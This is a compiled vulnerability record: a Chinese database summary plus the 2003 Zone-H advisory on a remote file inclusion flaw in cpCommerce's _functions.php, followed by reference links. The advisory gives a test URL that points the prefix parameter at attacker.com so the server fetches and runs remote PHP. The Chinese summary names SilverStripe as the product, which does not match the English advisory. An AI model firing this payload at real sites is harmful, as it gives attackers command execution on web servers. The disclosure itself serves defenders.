https://cxsecurity.com/issue/WLB-2007100122
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-440

Silverstripe是新西兰SilverStripe公司开发的一套自由且开源的内容管理系统。e-commerce是其中的一个电子商务模块。e-commerce包含的_functions.php脚本可包含远程文件，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。_functions.php包含如下有问题代码：require_once(“{$prefix}_config.php”);require_once(“{$prefix}_gateways.php”);由于对$prefix变量缺少充分过滤，攻击者可以指定远程服务器上的文件作为包含文件，可导致以WEB权限执行攻击者提供的恶意PHP命令。

ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce

Published: 19 October 2003
Name: cpCommerce Affected Versions: 0.05f (and other versions?)
Vendor: http://www.cpcommerce.org
Issue: file inclusion vulnerability
Author: Astharot (at Zone-H.org)

Description
**********
Zone-H Security Team has discovered a flaw in cpCommerce. cpCommerce "is an
open-source e-commerce solution that is entirely template and module based.".

Details
**********
There's a file inclusion vulnerability in the _functions.php file, line 13-14:

require_once("{$prefix}_config.php");
  require_once("{$prefix}_gateways.php");

Is it possible for a remote attacker to include an external file and execute
arbitrary commands with the privileges of the webserver (nobody by default).

To test the vulnerability try this:

http://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=http://
www.attacker.com/index

In this way the file "http://www.attacker.com/index_config.php" or
"http://www.attacker.com/index_gateways.php" will be included and executed on
the server.

Solution
**********
The author has been contacted and he published a temporary fix in the cpCommerce
website forum, waiting for the new version.

The patch is avaible here:
http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=8
64.

Suggestions
**********
Fix the script with the patch proposed by the author.

Link to ariginal article here:
 
http://www.zone-h.org/en/advisories/read/id=3284/

Astharot - Zone-H Admin
-- 
http://www.zone-h.org - astharot (at) zone-h (dot) org [email concealed]
PGP Key: http://www.gife.org/astharot.asc

Linux User #292132

来源:XF
名称:cpCommerce-functionsphp-file-include(13457)
链接:http://xforce.iss.net/xforce/xfdb/13457
来源:BID
名称:8851
链接:http://www.securityfocus.com/bid/8851
来源:BUGTRAQ
名称:20031019ZH2003-31SA(securityadvisory):fileinclusionvulnerabilityincpCommerce
链接:http://www.securityfocus.com/archive/1/341757
来源:www.securiteam.com
链接:http://www.securiteam.com/unixfocus/6H00E2K8KG.html
来源:cpcommerce.org
链接:http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864
来源:SREASON
名称:3301
链接:http://securityreason.com/securityalert/3301
来源：NSFOCUS
名称：5564
链接：http://www.nsfocus.net/vulndb/5564